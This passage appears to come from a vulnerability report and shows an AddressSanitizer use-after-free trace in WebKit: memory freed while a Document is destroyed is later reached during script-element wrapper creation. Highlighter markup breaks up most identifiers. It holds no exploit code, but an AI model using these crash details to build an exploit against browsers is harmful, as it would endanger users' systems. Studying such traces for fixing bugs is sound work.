class="hljs-number">e::</span>createJSHTMLWrapper(WebCor<span class="hljs-number">e::</span>JSDOMGlobalObject*, WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>HTMLElement, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>HTMLElement> >&&) DerivedSources/WebCore/JSHTMLElementWrapperFactory.cpp:<span class="hljs-number">795</span><br> #<span class="hljs-number">51</span> <span class="hljs-number">0</span>x7fbd0511cd70 in createNewElementWrapper Source/WebCore/bindings/js/JSElementCustom.cpp:<span class="hljs-number">55</span><br> #<span class="hljs-number">52</span> <span class="hljs-number">0</span>x7fbd0511cd70 in WebCor<span class="hljs-number">e::</span>toJSNewlyCreated(JS<span class="hljs-number">C::</span>JSGlobalObject*, WebCor<span class="hljs-number">e::</span>JSDOMGlobalObject*, WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>Element, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>Element> >&&) Source/WebCore/bindings/js/JSElementCustom.cpp:<span class="hljs-number">77</span><br> #<span class="hljs-number">53</span> <span class="hljs-number">0</span>x7fbd037ec467 in JS<span class="hljs-number">C::</span>JSValue WebCor<span class="hljs-number">e::</span>JSConverter<WebCor<span class="hljs-number">e::</span>IDLInterface<WebCor<span class="hljs-number">e::</span>Element> ><span class="hljs-number">::</span>convertNewlyCreated<WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>Element, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>Element> > >(JS<span class="hljs-number">C::</span>JSGlobalObject&, WebCor<span class="hljs-number">e::</span>JSDOMGlobalObject&, WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>Element, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>Element> >&&) Source/WebCore/bindings/js/JSDOMConvertInterface.h:<span class="hljs-number">87</span><br> #<span class="hljs-number">54</span> <span class="hljs-number">0</span>x7fbd037ec467 in JS<span class="hljs-number">C::</span>JSValue WebCor<span class="hljs-number">e::</span>toJSNewlyCreated<WebCor<span class="hljs-number">e::</span>IDLInterface<WebCor<span class="hljs-number">e::</span>Element>, WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>Element, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>Element> > >(JS<span class="hljs-number">C::</span>JSGlobalObject&, WebCor<span class="hljs-number">e::</span>JSDOMGlobalObject&, WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>Element, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>Element> >&&) Source/WebCore/bindings/js/JSDOMConvertBase.h:<span class="hljs-number">162</span><br> #<span class="hljs-number">55</span> <span class="hljs-number">0</span>x7fbd037ec467 in st<span class="hljs-number">d::</span>enable_if<WebCor<span class="hljs-number">e::</span>IsExceptionOr<WebCor<span class="hljs-number">e::</span>ExceptionOr<WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>Element, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>Element> > > ><span class="hljs-number">::</span>value, JS<span class="hljs-number">C::</span>JSValue><span class="hljs-number">::</span>type WebCor<span class="hljs-number">e::</span>toJSNewlyCreated<WebCor<span class="hljs-number">e::</span>IDLInterface<WebCor<span class="hljs-number">e::</span>Element>, WebCor<span class="hljs-number">e::</span>ExceptionOr<WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>Element, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>Element> > > >(JS<span class="hljs-number">C::</span>JSGlobalObject&, WebCor<span class="hljs-number">e::</span>JSDOMGlobalObject&, JS<span class="hljs-number">C::</span>ThrowScope&, WebCor<span class="hljs-number">e::</span>ExceptionOr<WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>Element, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>Element> > >&&) Source/WebCore/bindings/js/JSDOMConvertBase.h:<span class="hljs-number">202</span><br> #<span class="hljs-number">56</span> <span class="hljs-number">0</span>x7fbd037ec467 in jsDocumentPrototypeFunctionCreateElementBody DerivedSources/WebCore/JSDocument.cpp:<span class="hljs-number">5071</span><br> #<span class="hljs-number">57</span> <span class="hljs-number">0</span>x7fbd037ec467 in call<WebCor<span class="hljs-number">e::</span>jsDocumentPrototypeFunctionCreateElementBody> Source/WebCore/bindings/js/JSDOMOperation.h:<span class="hljs-number">53</span><br> #<span class="hljs-number">58</span> <span class="hljs-number">0</span>x7fbd037ec467 in WebCor<span class="hljs-number">e::</span>jsDocumentPrototypeFunctionCreateElement(JS<span class="hljs-number">C::</span>JSGlobalObject*, JS<span class="hljs-number">C::</span>CallFrame*) DerivedSources/WebCore/JSDocument.cpp:<span class="hljs-number">5076</span><br> #<span class="hljs-number">59</span> <span class="hljs-number">0</span>x7fbca<span class="hljs-number">9342177</span> (<unknown module>)<br><br><span class="hljs-number">0</span>x60<span class="hljs-number">70000b4a48</span> is located <span class="hljs-number">8</span> bytes inside of <span class="hljs-number">80</span>-byte region [<span class="hljs-number">0</span>x60<span class="hljs-number">70000b4a40</span>,<span class="hljs-number">0</span>x60<span class="hljs-number">70000b4a90</span>)<br>freed by thread T0 here:<br> #<span class="hljs-number">0</span> <span class="hljs-number">0</span>x7fbd0ae8f7a8 in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.<span class="hljs-number">4</span>+<span class="hljs-number">0</span>xde7a8)<br> #<span class="hljs-number">1</span> <span class="hljs-number">0</span>x7fbcfc05f8a8 in WT<span class="hljs-number">F::</span>fastFree(void*) Source/WTF/wtf/FastMalloc.cpp:<span class="hljs-number">226</span><br> #<span class="hljs-number">2</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">01f9a1c9</span> in WT<span class="hljs-number">F::</span>FastMallo<span class="hljs-number">c::</span>free(void*) DerivedSources/ForwardingHeaders/wtf/FastMalloc.h:<span class="hljs-number">228</span><br> #<span class="hljs-number">3</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">01f9a1c9</span> in WT<span class="hljs-number">F::</span>HashTable<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>IdentityExtractor, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > ><span class="hljs-number">::</span>deallocateTable(WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >*) DerivedSources/ForwardingHeaders/wtf/HashTable.h:<span class="hljs-number">1226</span><br> #<span class="hljs-number">4</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">0598f680</span> in WT<span class="hljs-number">F::</span>HashTable<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>IdentityExtractor, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > >::~HashTable() DerivedSources/ForwardingHeaders/wtf/HashTable.h:<span class="hljs-number">412</span><br> #<span class="hljs-number">5</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">0598f680</span> in WT<span class="hljs-number">F::</span>HashSet<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > >::~HashSet() DerivedSources/ForwardingHeaders/wtf/HashSet.h:<span class="hljs-number">33</span><br> #<span class="hljs-number">6</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">0598f680</span> in WT<span class="hljs-number">F::</span>WeakHashSet<WebCor<span class="hljs-number">e::</span>DocumentTimeline>::~WeakHashSet() DerivedSources/ForwardingHeaders/wtf/WeakHashSet.h:<span class="hljs-number">44</span><br> #<span class="hljs-number">7</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">0598f680</span> in WebCor<span class="hljs-number">e::</span>Document::~Document() Source/WebCore/dom/Document.cpp:<span class="hljs-number">628</span><br> #<span class="hljs-number">8</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">060f6574</span> in WebCor<span class="hljs-number">e::</span>HTMLDocument::~HTMLDocument() Source/WebCore/html/HTMLDocument.h:<span class="hljs-number">29</span><br> #<span class="hljs-number">9</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">060f6660</span> in WebCor<span class="hljs-number">e::</span>HTMLDocument::~HTMLDocument() Source/WebCore/html/HTMLDocument.h:<span class="hljs-number">29</span><br> #<span class="hljs-number">10</span> <span class="hljs-number">0</span>x7fbd0599b49c in WebCor<span class="hljs-number">e::</span>Document<span class="hljs-number">::</span>removedLastRef() Source/WebCore/dom/Document.cpp:<span class="hljs-number">766</span><br> #<span class="hljs-number">11</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">05b2a2a7</span> in WebCor<span class="hljs-number">e::</span>No<span class="hljs-number">de::</span>removedLastRef() Source/WebCore/dom/Node.cpp:<span class="hljs-number">2533</span><br> #<span class="hljs-number">12</span> <span class="hljs-number">0</span>x7fbd05b2fa14 in WebCor<span class="hljs-number">e::</span>No<span class="hljs-number">de::</span>deref() const Source/WebCore/dom/Node.h:<span class="hljs-number">716</span><br> #<span class="hljs-number">13</span> <span class="hljs-number">0</span>x7fbd05b2fa14 in WebCor<span class="hljs-number">e::</span>No<span class="hljs-number">de::</span>derefEventTarget() Source/WebCore/dom/Node.cpp:<span class="hljs-number">825</span><br> #<span class="hljs-number">14</span> <span class="hljs-number">0</span>x7fbd038f70cd in WebCor<span class="hljs-number">e::</span>EventTarget<span class="hljs-number">::</span>deref() Source/WebCore/dom/EventTarget.h:<span class="hljs-number">58</span><br> #<span class="hljs-number">15</span> <span class="hljs-number">0</span>x7fbd038f70cd in WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>EventTarget, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>EventTarget> >::~Ref() DerivedSources/ForwardingHeaders/wtf/Ref.h:<span class="hljs-number">61</span><br> #<span class="hljs-number">16</span> <span class="hljs-number">0</span>x7fbd038f70cd in WebCor<span class="hljs-number">e::</span>JSDOMWrapper<WebCor<span class="hljs-number">e::</span>EventTarget>::~JSDOMWrapper() Source/WebCore/bindings/js/JSDOMWrapper.h:<span class="hljs-number">71</span><br> #<span class="hljs-number">17</span> <span class="hljs-number">0</span>x7fbd038f70cd in WebCor<span class="hljs-number">e::</span>JSEventTarget::~JSEventTarget() DerivedSources/WebCore/JSEventTarget.h:<span class="hljs-number">30</span><br> #<span class="hljs-number">18</span> <span class="hljs-number">0</span>x7fbd038f70cd in WebCor<span class="hljs-number">e::</span>JSEventTarget<span class="hljs-number">::</span>destroy(JS<span class="hljs-number">C::</span>JSCell*) DerivedSources/WebCore/JSEventTarget.cpp:<span class="hljs-number">234</span><br> #<span class="hljs-number">19</span> <span class="hljs-number">0</span>x7fbcfb288c7c in JS<span class="hljs-number">C::</span>JSDestructibleObjectDestroyFun<span class="hljs-number">c::</span>operator()(JS<span class="hljs-number">C::</span>VM&, JS<span class="hljs-number">C::</span>JSCell*) const Source/JavaScriptCore/runtime/JSDestructibleObjectHeapCellType.cpp:<span class="hljs-number">37</span><br> #<span class="hljs-number">20</span> <span class="hljs-number">0</span>x7fbcfb288c7c in void JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>specializedSweep<true, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>EmptyMode)<span class="hljs-number">1</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepMode)<span class="hljs-number">1</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepDestructionMode)<span class="hljs-number">1</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>ScribbleMode)<span class="hljs-number">0</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>NewlyAllocatedMode)<span class="hljs-number">1</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>MarksMode)<span class="hljs-number">1</span>, JS<span class="hljs-number">C::</span>JSDestructibleObjectDestroyFunc>(JS<span class="hljs-number">C::</span>FreeList*, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>EmptyMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepDestructionMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>ScribbleMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>NewlyAllocatedMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>MarksMode, JS<span class="hljs-number">C::</span>JSDestructibleObjectDestroyFunc const&)::{lambda(void*)#<span class="hljs-number">1</span>}<span class="hljs-number">::</span>operator()(void*) const Source/JavaScriptCore/heap/MarkedBlockInlines.h:<span class="hljs-number">260</span><br> #<span class="hljs-number">21</span> <span class="hljs-number">0</span>x7fbcfb288c7c in void JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>specializedSweep<true, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>EmptyMode)<span class="hljs-number">1</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepMode)<span class="hljs-number">1</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepDestructionMode)<span class="hljs-number">1</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>ScribbleMode)<span class="hljs-number">0</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>NewlyAllocatedMode)<span class="hljs-number">1</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>MarksMode)<span class="hljs-number">1</span>, JS<span class="hljs-number">C::</span>JSDestructibleObjectDestroyFunc>(JS<span class="hljs-number">C::</span>FreeList*, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>EmptyMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepDestructionMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>ScribbleMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>NewlyAllocatedMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>MarksMode, JS<span class="hljs-number">C::</span>JSDestructibleObjectDestroyFunc const&)::{lambda(unsigned long)#<span class="hljs-number">3</span>}<span class="hljs-number">::</span>operator()(unsigned long) const Source/JavaScriptCore/heap/MarkedBlockInlines.h:<span class="hljs-number">319</span><br> #<span class="hljs-number">22</span> <span class="hljs-number">0</span>x7fbcfb288c7c in void JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>specializedSweep<true, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>EmptyMode)<span class="hljs-number">1</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepMode)<span class="hljs-number">1</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepDestructionMode)<span class="hljs-number">1</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>ScribbleMode)<span class="hljs-number">0</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>NewlyAllocatedMode)<span class="hljs-number">1</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>MarksMode)<span class="hljs-number">1</span>, JS<span class="hljs-number">C::</span>JSDestructibleObjectDestroyFunc>(JS<span class="hljs-number">C::</span>FreeList*, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>EmptyMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepDestructionMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>ScribbleMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>NewlyAllocatedMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>MarksMode, JS<span class="hljs-number">C::</span>JSDestructibleObjectDestroyFunc const&) Source/JavaScriptCore/heap/MarkedBlockInlines.h:<span class="hljs-number">341</span><br> #<span class="hljs-number">23</span> <span class="hljs-number">0</span>x7fbcfb266d9b in void JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>finishSweepKnowingHeapCellType<JS<span class="hljs-number">C::</span>JSDestructibleObjectDestroyFunc>(JS<span class="hljs-number">C::</span>FreeList*, JS<span class="hljs-number">C::</span>JSDestructibleObjectDestroyFunc const&)::{lambda()#<span class="hljs-number">1</span>}<span class="hljs-number">::</span>operator()() const Source/JavaScriptCore/heap/MarkedBlockInlines.h:<span class="hljs-number">423</span><br> #<span class="hljs-number">24</span> <span class="hljs-number">0</span>x7fbcfb266d9b in void JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>finishSweepKnowingHeapCellType<JS<span class="hljs-number">C::</span>JSDestructibleObjectDestroyFunc>(JS<span class="hljs-number">C::</span>FreeList*, JS<span class="hljs-number">C::</span>JSDestructibleObjectDestroyFunc const&) Source/JavaScriptCore/heap/MarkedBlockInlines.h:<span class="hljs-number">435</span><br> #<span class="hljs-number">25</span> <span class="hljs-number">0</span>x7fbcfb266d9b in JS<span class="hljs-number">C::</span>JSDestructibleObjectHeapCellTyp<span class="hljs-number">e::</span>finishSweep(JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handle&, JS<span class="hljs-number">C::</span>FreeList*) Source/JavaScriptCore/runtime/JSDestructibleObjectHeapCellType.cpp:<span class="hljs-number">52</span><br> #<span class="hljs-number">26</span> <span class="hljs-number">0</span>x7fbcfa4f4c96 in JS<span class="hljs-number">C::</span>Subsp<span class="hljs-number">ace::</span>finishSweep(JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handle&, JS<span class="hljs-number">C::</span>FreeList*) Source/JavaScriptCore/heap/Subspace.cpp:<span class="hljs-number">64</span><br> #<span class="hljs-number">27</span> <span class="hljs-number">0</span>x7fbcfa4c9381 in JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>sweep(JS<span class="hljs-number">C::</span>FreeList*) Source/JavaScriptCore/heap/MarkedBlock.cpp:<span class="hljs-number">419</span><br> #<span class="hljs-number">28</span> <span class="hljs-number">0</span>x7fbcfa48459c in JS<span class="hljs-number">C::</span>LocalAllocator<span class="hljs-number">::</span>tryAllocateIn(JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handle*) Source/JavaScriptCore/heap/LocalAllocator.cpp:<span class="hljs-number">226</span><br> #<span class="hljs-number">29</span> <span class="hljs-number">0</span>x7fbcfa484d0a in JS<span class="hljs-number">C::</span>LocalAllocator<span class="hljs-number">::</span>tryAllocateWithoutCollecting() Source/JavaScriptCore/heap/LocalAllocator.cpp:<span class="hljs-number">192</span><br> #<span class="hljs-number">30</span> <span class="hljs-number">0</span>x7fbcfa48e44e in JS<span class="hljs-number">C::</span>LocalAllocator<span class="hljs-number">::</span>allocateSlowCase(JS<span class="hljs-number">C::</span>Heap&, JS<span class="hljs-number">C::</span>GCDeferralContext*, JS<span class="hljs-number">C::</span>AllocationFailureMode) Source/JavaScriptCore/heap/LocalAllocator.cpp:<span class="hljs-number">133</span><br> #<span class="hljs-number">31</span> <span class="hljs-number">0</span>x7fbd03a99b91 in JS<span class="hljs-number">C::</span>LocalAllocator<span class="hljs-number">::</span>allocate(JS<span class="hljs-number">C::</span>Heap&, JS<span class="hljs-number">C::</span>GCDeferralContext*, JS<span class="hljs-number">C::</span>AllocationFailureMode)::{lambda()#<span class="hljs-number">1</span>}<span class="hljs-number">::</span>operator()() const DerivedSources/ForwardingHeaders/JavaScriptCore/LocalAllocatorInlines.h:<span class="hljs-number">40</span><br> #<span class="hljs-number">32</span> <span class="hljs-number">0</span>x7fbd03a99b91 in JS<span class="hljs-number">C::</span>HeapCell* JS<span class="hljs-number">C::</span>FreeList<span class="hljs-number">::</span>allocate<JS<span class="hljs-number">C::</span>LocalAllocator<span class="hljs-number">::</span>allocate(JS<span class="hljs-number">C::</span>Heap&, JS<span class="hljs-number">C::</span>GCDeferralContext*, JS<span class="hljs-number">C::</span>AllocationFailureMode)::{lambda()#<span class="hljs-number">1</span>}>(JS<span class="hljs-number">C::</span>LocalAllocator<span class="hljs-number">::</span>allocate(JS<span class="hljs-number">C::</span>Heap&, JS<span class="hljs-number">C::</span>GCDeferralContext*, JS<span class="hljs-number">C::</span>AllocationFailureMode)::{lambda()#<span class="hljs-number">1</span>} const&) DerivedSources/ForwardingHeaders/JavaScriptCore/FreeListInlines.h:<span class="hljs-number">46</span><br> #<span class="hljs-number">33</span> <span class="hljs-number">0</span>x7fbd03a99b91 in JS<span class="hljs-number">C::</span>LocalAllocator<span class="hljs-number">::</span>allocate(JS<span class="hljs-number">C::</span>Heap&, JS<span class="hljs-number">C::</span>GCDeferralContext*, JS<span class="hljs-number">C::</span>AllocationFailureMode) DerivedSources/ForwardingHeaders/JavaScriptCore/LocalAllocatorInlines.h:<span class="hljs-number">41</span><br> #<span class="hljs-number">34</span> <span class="hljs-number">0</span>x7fbd03a99b91 in JS<span class="hljs-number">C::</span>Allocator<span class="hljs-number">::</span>allocate(JS<span class="hljs-number">C::</span>Heap&, JS<span class="hljs-number">C::</span>GCDeferralContext*, JS<span class="hljs-number">C::</span>AllocationFailureMode) const DerivedSources/ForwardingHeaders/JavaScriptCore/AllocatorInlines.h:<span class="hljs-number">35</span><br> #<span class="hljs-number">35</span> <span class="hljs-number">0</span>x7fbd03a99b91 in JS<span class="hljs-number">C::</span>CompleteSubsp<span class="hljs-number">ace::</span>allocateNonVirtual(JS<span class="hljs-number">C::</span>VM&, unsigned long, JS<span class="hljs-number">C::</span>GCDeferralContext*, JS<span class="hljs-number">C::</span>AllocationFailureMode) DerivedSources/ForwardingHeaders/JavaScriptCore/CompleteSubspaceInlines.h:<span class="hljs-number">39</span><br> #<span class="hljs-number">36</span> <span class="hljs-number">0</span>x7fbd03af7167 in void* JS<span class="hljs-number">C::</span>tryAllocateCellHelper<WebCor<span class="hljs-number">e::</span>JSHTMLScriptElement>(JS<span class="hljs-number">C::</span>Heap&, unsigned long, JS<span class="hljs-number">C::</span>GCDeferralContext*, JS<span class="hljs-number">C::</span>AllocationFailureMode) DerivedSources/ForwardingHeaders/JavaScriptCore/JSCellInlines.h:<span class="hljs-number">163</span><br> #<span class="hljs-number">37</span> <span class="hljs-number">0</span>x7fbd03af7167 in void* JS<span class="hljs-number">C::</span>allocateCell<WebCor<span class="hljs-number">e::</span>JSHTMLScriptElement>(JS<span class="hljs-number">C::</span>Heap&, unsigned long) DerivedSources/ForwardingHeaders/JavaScriptCore/JSCellInlines.h:<span class="hljs-number">177</span><br> #<span class="hljs-number">38</span> <span class="hljs-number">0</span>x7fbd03af7167 in WebCor<span class="hljs-number">e::</span>JSHTMLScriptElement<span class="hljs-number">::</span>create(JS<span class="hljs-number">C::</span>Structure*, WebCor<span class="hljs-number">e::</span>JSDOMGlobalObject*, WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>HTMLScriptElement, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>HTMLScriptElement> >&&) DerivedSources/WebCore/JSHTMLScriptElement.h:<span class="hljs-number">35</span><br> #<span class="hljs-number">39</span> <span class="hljs-number">0</span>x7fbd03af7167 in st<span class="hljs-number">d::</span>enable_if<st<span class="hljs-number">d::</span>is_same<WebCor<span class="hljs-number">e::</span>HTMLScriptElement, WebCor<span class="hljs-number">e::</span>HTMLScriptElement><span class="hljs-number">::</span>value, WebCor<span class="hljs-number">e::</span>JSDOMWrapperConverterTraits<WebCor<span class="hljs-number">e::</span>HTMLScriptElement><span class="hljs-number">::</span>WrapperClass*><span class="hljs-number">::</span>type WebCor<span class="hljs-number">e::</span>createWrapper<WebCor<span class="hljs-number">e::</span>HTMLScriptElement, WebCor<span class="hljs-number">e::</span>HTMLScriptElement>(WebCor<span class="hljs-number">e::</span>JSDOMGlobalObject*, WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>HTMLScriptElement, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>HTMLScriptElement> >&&) Source/WebCore/bindings/js/JSDOMWrapperCache.h:<span class="hljs-number">187</span><br> #<span class="hljs-number">40</span> <span class="hljs-number">0</span>x7fbd03af7167 in st<span class="hljs-number">d::</span>enable_if<!st<span class="hljs-number">d::</span>is_same<WebCor<span class="hljs-number">e::</span>HTMLScriptElement, WebCor<span class="hljs-number">e::</span>HTMLElement><span class="hljs-number">::</span>value, WebCor<span 